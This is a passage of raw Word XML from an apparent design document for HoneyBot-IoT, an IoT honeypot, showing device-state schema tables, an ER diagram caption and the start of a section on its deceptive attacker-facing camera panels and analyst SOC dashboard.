            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFAULT '{}'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Extra connection metadata.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Redis: device:&lt;name&gt; hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">cctv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HASH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">status, recording, motion, viewers, firmware, resolution, serial, last_motion.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">smartlock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HASH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">lock_state, door, battery, auto_lock, api_token, last_action, last_change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">sensor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HASH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">temperature, pressure, humidity, alarm, temp_threshold, pressure_threshold, interval, plc_link.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The ER diagram shows the relationships. sessions to events is the only enforced foreign key with cascade delete; the intelligence tables reference sessions and detections and are rebuilt by the engine, so they never block an insert on the capture path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="4896612"/>
            <wp:docPr id="21" name="Picture 21"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="diag_er.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="4896612"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">18</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: ER Diagram of the 70% Database Schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC7BC08" w14:textId="2205920E" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9013" w:name="_Toc69013"/>
      <w:r>
        <w:t xml:space="preserve">6. Human Interface Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9013"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HoneyBot-IoT has two kinds of users and therefore two kinds of interface. The attacker sees deceptive device interfaces: a network camera web panel, a smart-lock REST API, an industrial sensor HMI, and command-line sessions over SSH, Telnet, MQTT and RTSP. Every object an attacker touches on these interfaces produces an event. The security analyst sees the SOC dashboard, which turns those events into statistics, a world map, detections with MITRE ATT&amp;CK techniques and indicators of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The analyst opens the dashboard in a browser and logs in with the Nginx credentials (bcrypt). Events, detections and device changes are pushed over a WebSocket, so the pages update live. The search box finds any IP, command, payload or credential; the Detect now button forces an immediate classification pass; and every page links to the attacker, session and device detail pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9014" w:name="_Toc69014"/>
      <w:r>
        <w:t xml:space="preserve">6.1 Screen Images</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9014"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3017520" cy="2489454"/>
            <wp:docPr id="22" name="Picture 22"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cctv_login_c.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3017520" cy="2489454"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">19</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Network Camera Login Page (HTTP :8080, attacker-facing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The camera panel imitates a common IP camera model and firmware. The 30% build's project footer was removed so the page cannot be fingerprinted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3017520" cy="2715768"/>
            <wp:docPr id="23" name="Picture 23"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cctv_login_error_c.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3017520" cy="2715768"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">20</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Login Page after Rejected Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A wrong pair is answered after a short delay with the vendor's own error message, which invites the attacker to try further passwords; every attempt is logged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="2362200"/>
            <wp:docPr id="24" name="Picture 24"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cctv_live_c.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="2362200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">21</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Camera Live View after Successful Login (admin:admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A default credential opens the live view with four channels, device information and the RTSP stream address. The recording and motion values come from the shared Device State and change over time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="3017520" cy="1659636"/>
            <wp:docPr id="25" name="Picture 25"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cctv_settings_c.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
